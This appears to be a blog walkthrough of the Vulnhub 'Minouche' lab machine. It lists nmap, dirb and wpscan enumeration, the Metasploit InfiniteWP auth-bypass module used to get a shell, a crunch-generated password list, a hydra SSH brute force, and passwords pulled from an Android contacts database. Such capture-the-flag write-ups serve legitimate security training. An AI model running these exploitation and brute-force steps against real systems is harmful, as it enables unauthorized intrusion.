Vulnhub – Minouche Walkthrough

Scanning the box with nmap –A –T4 –p- 192.168.1.9 –vv

Then scanning with dirb http://192.168.1.9 /usr/share/dirb/wordlist/big.txt

The host is running WordPress so we scan for users wpscan –url http://192.168.1.9 –e u

And search for plugins wpscan –url http://192.168.1.9 -e p –plugins-detection aggressive make sure to use “–plugins-detection aggressive” as with enumerating with normal plugins nothing will come up .

Searching for the plugin with searchsploit WordPress Plugin InfiniteWP:

Now we run Metasploit and use exploit/unix/webapp/wp_infinitewp_auth_bypass

And we got shell:

Ok there is a file named kitty.txt in the / directory:

So we use crunch to generate the password, the command should be crunch 13 13 –t as “$”Minouche20%% took me a while to realize the $ needs to be between “”

And then we use hydra to brute force the ssh service hydra -l kitty -P password.txt ssh://192.168.1.9

And the password is $Minouche2005

Now for the android.zip file,i transferred it back to my machine and unzipped it and went through it to see if something interesting and i found a photo of contacts and there is a one contact named Pincode in this path data/system_ce/0/snapshots/:

Now to search the contacts folder /root/data/data/com.android.providers.contacts/databases/contacts2.db:

In the Browse Data section, going through the data you will find the password YouWillNeverGue$$This

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s